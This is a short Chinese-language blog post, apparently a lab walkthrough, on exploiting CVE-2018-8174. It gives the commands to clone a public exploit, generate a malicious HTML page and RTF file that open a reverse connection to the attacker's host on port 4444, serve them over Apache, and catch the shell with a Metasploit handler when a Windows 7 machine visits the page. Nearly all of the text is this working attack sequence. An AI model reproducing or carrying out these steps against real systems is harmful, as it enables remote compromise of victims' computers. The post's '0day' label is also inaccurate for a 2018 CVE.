0day漏洞
作者:互联网
git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git 从github上下载文件
cd CVE-2018-8174_EXP.git 进入文件夹
python CVE-2018-8174.py -u http://192.168.44.131/expolit.html -o hack.rtf -i 192.168.44.131 -p 4444
(-u 是攻击机的地址 -o生成一个文件 -i建立一个反弹链接 接口为4444)
cp exploit.html /var/www/html(将exploit.html 复制到var/www/html)
systemctl start apache2(启动阿帕奇服务)
cp hack.rtf /var/www/html (将文件复制到路径中)
接下来
启动msfconsole 模块
search handler找一下服务
使用命令,设置后台↓
show options(查看配置信息)
set lhost 192.168.44.131(设置下配置信息中的lhost)
- set RHOST 目标主机地址 :该命令会设置好要攻击的目标主机地址
- set LHOST 攻击机地址 :该命令设置攻击机的地址,使目标主机回连至攻击机
- set LPORT 回连的端口 :该命令设置目标主机回连至攻击机的端口,默认为4444
然后用win7访问目标的网站
访问阿帕奇默认网页下的刚刚的python生成的文件
网页闪退,但是攻击机得到了响应
在kail中输入run命令运行
标签:set,攻击机,0day,192.168,漏洞,地址,html,2018 来源: https://www.cnblogs.com/ouzhougou/p/16268825.html